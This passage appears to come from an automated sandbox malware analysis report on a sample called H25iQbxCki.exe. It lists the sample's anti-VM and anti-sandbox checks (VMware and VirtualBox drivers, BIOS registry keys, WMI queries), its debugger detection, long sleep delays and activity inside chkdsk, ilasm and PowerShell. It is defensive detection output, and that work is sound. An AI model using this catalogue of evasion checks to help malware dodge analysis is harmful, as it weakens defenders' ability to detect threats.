Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: H25iQbxCki.exe PID: 7420, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\H25iQbxCki.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAMEP

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory allocated: 214EBEB0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Memory allocated: 214ED950000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Code function: 5_2_05BF096E rdtsc

5_2_05BF096E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5616	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3992	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 9805	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 3.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8160	Thread sleep count: 168 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8160	Thread sleep time: -336000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8160	Thread sleep count: 9805 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8160	Thread sleep time: -19610000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe TID: 1188	Thread sleep time: -105000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe TID: 1188	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe TID: 1188	Thread sleep time: -46500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe TID: 1188	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe TID: 1188	Thread sleep time: -49000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\chkdsk.exe

Code function: 12_2_0457B5C0 FindFirstFileW,FindNextFileW,FindClose,

12_2_0457B5C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMUP
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: firefox.exe, 00000011.00000002.2206810675.00000242825DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREH
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREP
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: uwZgUlCQSPVT.exe, 00000010.00000002.4144880968.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareP
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIP
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004A94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
Source: H25iQbxCki.exe, 00000000.00000002.1946986176.00000214EE1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Code function: 5_2_05BF096E rdtsc

5_2_05BF096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Code function: 5_2_004175D3 LdrLoadDll,

5_2_004175D3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD45B1 mov eax, dword ptr fs:[00000030h]	5_2_05BD45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD45B1 mov eax, dword ptr fs:[00000030h]	5_2_05BD45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE59C mov eax, dword ptr fs:[00000030h]	5_2_05BEE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE4588 mov eax, dword ptr fs:[00000030h]	5_2_05BE4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2582 mov eax, dword ptr fs:[00000030h]	5_2_05BB2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2582 mov ecx, dword ptr fs:[00000030h]	5_2_05BB2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC5ED mov eax, dword ptr fs:[00000030h]	5_2_05BEC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC5ED mov eax, dword ptr fs:[00000030h]	5_2_05BEC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_05BDE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB25E0 mov eax, dword ptr fs:[00000030h]	5_2_05BB25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C305A7 mov eax, dword ptr fs:[00000030h]	5_2_05C305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C305A7 mov eax, dword ptr fs:[00000030h]	5_2_05C305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C305A7 mov eax, dword ptr fs:[00000030h]	5_2_05C305A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB65D0 mov eax, dword ptr fs:[00000030h]	5_2_05BB65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA5D0 mov eax, dword ptr fs:[00000030h]	5_2_05BEA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA5D0 mov eax, dword ptr fs:[00000030h]	5_2_05BEA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE5CF mov eax, dword ptr fs:[00000030h]	5_2_05BEE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE5CF mov eax, dword ptr fs:[00000030h]	5_2_05BEE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE53E mov eax, dword ptr fs:[00000030h]	5_2_05BDE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE53E mov eax, dword ptr fs:[00000030h]	5_2_05BDE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE53E mov eax, dword ptr fs:[00000030h]	5_2_05BDE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE53E mov eax, dword ptr fs:[00000030h]	5_2_05BDE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDE53E mov eax, dword ptr fs:[00000030h]	5_2_05BDE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535 mov eax, dword ptr fs:[00000030h]	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C46500 mov eax, dword ptr fs:[00000030h]	5_2_05C46500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84500 mov eax, dword ptr fs:[00000030h]	5_2_05C84500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE656A mov eax, dword ptr fs:[00000030h]	5_2_05BE656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE656A mov eax, dword ptr fs:[00000030h]	5_2_05BE656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE656A mov eax, dword ptr fs:[00000030h]	5_2_05BE656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8550 mov eax, dword ptr fs:[00000030h]	5_2_05BB8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8550 mov eax, dword ptr fs:[00000030h]	5_2_05BB8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE44B0 mov ecx, dword ptr fs:[00000030h]	5_2_05BE44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB64AB mov eax, dword ptr fs:[00000030h]	5_2_05BB64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB04E5 mov ecx, dword ptr fs:[00000030h]	5_2_05BB04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3A4B0 mov eax, dword ptr fs:[00000030h]	5_2_05C3A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE420 mov eax, dword ptr fs:[00000030h]	5_2_05BAE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE420 mov eax, dword ptr fs:[00000030h]	5_2_05BAE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE420 mov eax, dword ptr fs:[00000030h]	5_2_05BAE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAC427 mov eax, dword ptr fs:[00000030h]	5_2_05BAC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3C460 mov ecx, dword ptr fs:[00000030h]	5_2_05C3C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE8402 mov eax, dword ptr fs:[00000030h]	5_2_05BE8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE8402 mov eax, dword ptr fs:[00000030h]	5_2_05BE8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE8402 mov eax, dword ptr fs:[00000030h]	5_2_05BE8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDA470 mov eax, dword ptr fs:[00000030h]	5_2_05BDA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDA470 mov eax, dword ptr fs:[00000030h]	5_2_05BDA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDA470 mov eax, dword ptr fs:[00000030h]	5_2_05BDA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36420 mov eax, dword ptr fs:[00000030h]	5_2_05C36420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA645D mov eax, dword ptr fs:[00000030h]	5_2_05BA645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD245A mov eax, dword ptr fs:[00000030h]	5_2_05BD245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE443 mov eax, dword ptr fs:[00000030h]	5_2_05BEE443
